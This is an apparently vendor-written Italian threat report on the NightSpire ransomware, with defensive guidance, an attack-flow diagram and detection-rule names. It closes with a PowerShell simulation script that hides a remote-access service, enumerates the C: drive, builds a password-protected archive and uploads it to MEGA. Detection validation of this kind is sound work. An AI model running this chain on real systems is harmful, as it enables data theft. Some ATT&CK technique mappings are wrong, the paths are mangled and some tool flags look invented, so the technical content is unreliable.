Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
NightSpire è una famiglia di ransomware basati su Go, osservata per la prima volta all’inizio del 2025, che utilizza un modello di doppia estorsione, rubando dati prima della crittografia e minacciando di pubblicarli su un sito di leak basato su Tor. Il ransomware aggiunge una .nspire estensione ai file crittografati e posiziona note di riscatto in ciascuna directory colpita, comprese le cartelle legate a OneDrive. I suoi operatori si affidano a strumenti di amministrazione remota legittimi per mantenere l’accesso e utilizzano utilità disponibili pubblicamente per la scoperta, l’archiviazione e l’esfiltrazione. Tra marzo e giugno 2025, la campagna ha colpito almeno 64 organizzazioni in 33 paesi.
Indagine
L’indagine ha mostrato che gli attaccanti hanno spesso ottenuto un accesso iniziale tramite RDP esposto e hanno poi installato Chrome Remote Desktop e AnyDesk come servizi persistenti. Hanno usato Everything per localizzare rapidamente i file, 7-Zip per creare archivi protetti da password e MEGAsync per caricare i dati rubati su MEGA cloud storage. L’encryptor basato su Go è stato eseguito sotto conhost.exe, ha enumerato tutti i drive disponibili e ha crittografato i file lasciando i nomi dei file di OneDrive invariati. La fase di estorsione si è basata su un sito leak ospitato su Tor usato per fare pressione sulle vittime dopo l’esfiltrazione.
Mitigazione
Le organizzazioni dovrebbero ridurre o eliminare l’esposizione diretta di RDP, monitorare per il dispiegamento inaspettato di strumenti legittimi di amministrazione remota come servizi, e applicare elenchi di autorizzazione delle applicazioni a binari come Chrome Remote Desktop e AnyDesk. Le rilevazioni comportamentali dovrebbero concentrarsi sull’enumerazione massiva dei file, la creazione di archivi e i caricamenti insoliti sui servizi di cloud storage. I backup regolari e le procedure di ripristino testate restano essenziali, e i controlli di rete dovrebbero bloccare gli endpoint di caricamento noti di MEGA. Le difese possono anche essere validate tramite esercizi controllati di simulazione ransomware come quelli offerti da Picus.
Risposta
Se viene rilevata un’attività di NightSpire, isolare immediatamente l’endpoint colpito, terminare il processo dell’encryptor e raccogliere la memoria volatile per l’analisi. Disabilitare i servizi malevoli, rimuovere gli strumenti di accesso remoto persiste e bloccare le comunicazioni di rete correlate. Il ripristino dovrebbe procedere da backup fidati e gli stakeholder rilevanti dovrebbero essere informati. L’incidente dovrebbe anche essere segnalato alle forze dell’ordine, mentre i difensori continuano a monitorare il sito leak di Tor associato per segni di dati pubblicati.
graph TB %% Definizioni classi classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef process fill:#ffcc99 %% Nodi action_initial_access[“<b>Azione</b> – Accesso iniziale<br/><b>Tecnica</b> – T1136 Creazione account<br/><b>Descrizione</b>: L’attaccante ha ottenuto accesso alla rete tramite Remote Desktop Protocol (RDP), stabilendo un primo punto d’appoggio.”] class action_initial_access action tool_rdp[“<b>Strumento</b> – Remote Desktop Protocol (RDP)<br/><b>Descrizione</b>: Protocollo che consente accesso remoto ai sistemi Windows.”] class tool_rdp tool action_persistence[“<b>Azione</b> – Persistenza<br/><b>Tecnica</b> – T1547.009 Modifica collegamenti<br/><b>Descrizione</b>: Installazione di AnyDesk e Chrome Remote Desktop come servizi e inserimento di collegamenti nella cartella di avvio.”] class action_persistence action tool_anydesk[“<b>Strumento</b> – AnyDesk<br/><b>Funzione</b>: Software di accesso remoto installato come servizio Windows (anydesk.lnk).”] class tool_anydesk tool tool_chrome_rd[“<b>Strumento</b> – Chrome Remote Desktop<br/><b>Funzione</b>: Strumento di accesso remoto eseguito tramite servizio remoting_host.exe.”] class tool_chrome_rd tool action_collection[“<b>Azione</b> – Raccolta<br/><b>Tecnica</b> – T1560.001 Archiviazione dati raccolti<br/><b>Descrizione</b>: Utilizzo di 7-Zip per comprimere cartelle selezionate in archivi protetti da password dopo enumerazione file con Everything.”] class action_collection action tool_7zip[“<b>Strumento</b> – 7-Zip<br/><b>Funzione</b>: Compressione di dati in archivi protetti da password.”] class tool_7zip tool tool_everything[“<b>Strumento</b> – Everything<br/><b>Funzione</b>: Strumento di ricerca rapida per enumerazione file.”] class tool_everything tool action_exfiltration[“<b>Azione</b> – Esfiltrazione<br/><b>Tecniche</b> – T1537 Trasferimento dati su account cloud<br/>T1567.002 Esfiltrazione tramite servizi web<br/><b>Descrizione</b>: Upload degli archivi su storage cloud MEGA tramite MEGAsync.”] class action_exfiltration action tool_megasync[“<b>Strumento</b> – MEGAsync<br/><b>Funzione</b>: Sincronizza file locali con MEGA cloud per esfiltrazione.”] class tool_megasync tool action_impact[“<b>Azione</b> – Impatto<br/><b>Tecnica</b> – T1486 Dati cifrati per impatto<br/><b>Descrizione</b>: Ransomware in Go eseguito tramite conhost.exe, cifratura file, aggiunta estensione .nspire e rilascio note di riscatto.”] class action_impact action malware_encryptor[“<b>Malware</b> – Ransomware Go<br/><b>Funzione</b>: Cifra file, modifica estensione, crea note di riscatto.”] class malware_encryptor malware process_conhost[“<b>Processo</b> – conhost.exe<br/><b>Ruolo</b>: Esegue il payload ransomware Go.”] class process_conhost process %% Connessioni action_initial_access –>|usa| tool_rdp action_initial_access –>|porta a| action_persistence action_persistence –>|installa| tool_anydesk action_persistence –>|installa| tool_chrome_rd action_persistence –>|porta a| action_collection action_collection –>|usa| tool_7zip action_collection –>|enumera con| tool_everything action_collection –>|porta a| action_exfiltration action_exfiltration –>|usa| tool_megasync action_exfiltration –>|porta a| action_impact action_impact –>|esegue| process_conhost process_conhost –>|avvia| malware_encryptor
Flusso di Attacco
Rilevamenti
Possibile Raccolta Dati [7zip] (tramite cmdline)
Visualizza
Software Alternativo di Accesso Remoto / Gestione (tramite creazione processo)
Visualizza
Possibile Installazione Nascosta di Chrome Remote Desktop (tramite cmdline)
Visualizza
Software Alternativo di Accesso Remoto / Gestione (tramite sistema)
Visualizza
Software Alternativo di Accesso Remoto / Gestione (tramite audit)
Visualizza
Rilevamento Strumenti di Persistenza e Esfiltrazione NightSpire Ransomware [Creazione Processo Windows]
Visualizza
Esecuzione Simulazione
Prerequisito: Il Controllo Pre-volo Telemetria & Base deve essere superato.
Motivo: Questa sezione descrive l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrativa di Attacco & Comandi:
- Impostazione Persistenza (T1547 / T1219): Installare Chrome Remote Desktop (percorso predefinito) e avviare il suo servizio per ottenere un controllo remoto persistente.
- Scoperta (T1083): Usa Everything.exe per enumerare tutti i file sul drive C:, salvando l’output in un elenco temporaneo.
- Archiviazione (T1037 / T1083): Invoca 7-Zip per comprimere i file scoperti in un archivio protetto da password.
- Esfiltrazione (T1219.003): Avvia MEGAsync per caricare l’archivio su un account MEGA.
La sequenza assicura che selezione_accesso_remoto (Chrome Remote Desktop) sia attivo mentre almeno uno di selezione_scoperta, selezione_archivio, o selezione_esfiltrazione avviene, soddisfacendo la condizione della regola.
-
Script di Test di Regressione:
# ------------------------------------------------------------------------- # Simulazione Persistenza Laterale & Esfiltrazione NightSpire # ------------------------------------------------------------------------- # Prerequisiti: # - Chrome Remote Desktop installato nel percorso predefinito # - Everything.exe installato nel percorso predefinito # - 7z.exe installato nel percorso predefinito # - MEGAsync installato nel percorso del profilo utente predefinito # ------------------------------------------------------------------------- # 1. Garantire che il servizio Chrome Remote Desktop sia in esecuzione (simula la persistenza) $crdPath = "$Env:ProgramFiles(x86)GoogleChrome Remote Desktop147.0.7727.3remoting_host.exe" if (Test-Path $crdPath) { Start-Process -FilePath $crdPath -ArgumentList "--start-service" -WindowStyle Hidden Write-Host "Servizio Chrome Remote Desktop avviato." } else { Write-Error "Chrome Remote Desktop non trovato in $crdPath" exit 1 } # 2. Scoperta file con Everything $everythingPath = "$Env:ProgramFilesEverythingEverything.exe" $discoveryOutput = "$env:TEMPfilelist.txt" if (Test-Path $everythingPath) { & $everythingPath -search "C:" -output $discoveryOutput Write-Host "Scoperta completata, risultati salvati in $discoveryOutput" } else { Write-Error "Everything.exe non trovato in $everythingPath" exit 1 } # 3. Archivia i file scoperti con 7-Zip $sevenZipPath = "$Env:ProgramFiles7-Zip7z.exe" $archivePath = "$env:TEMPexfil_archive.zip" if (Test-Path $sevenZipPath) { & $sevenZipPath a -tzip $archivePath "@$discoveryOutput" -p"StrongP@ssw0rd!" Write-Host "Archivio creato in $archivePath" } else { Write-Error "7z.exe non trovato in $sevenZipPath" exit 1 } # 4. Carica l'archivio tramite MEGAsync (esfiltrazione) $megaPath = "$Env:LOCALAPPDATAMEGAsyncMEGAsync.exe" if (Test-Path $megaPath) { & $megaPath --upload $archivePath Write-Host "Caricamento avviato tramite MEGAsync." } else { Write-Error "MEGAsync.exe non trovato in $megaPath" exit 1 } # Fine della simulazione -
Comandi di Pulizia:
# Arrestare il servizio Chrome Remote Desktop Stop-Process -Name "remoting_host" -Force -ErrorAction SilentlyContinue # Rimuovere i file temporanei Remove-Item -Path "$env:TEMPfilelist.txt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPexfil_archive.zip" -Force -ErrorAction SilentlyContinue # Arrestare eventualmente MEGAsync se in esecuzione Stop-Process -Name "MEGAsync" -Force -ErrorAction SilentlyContinue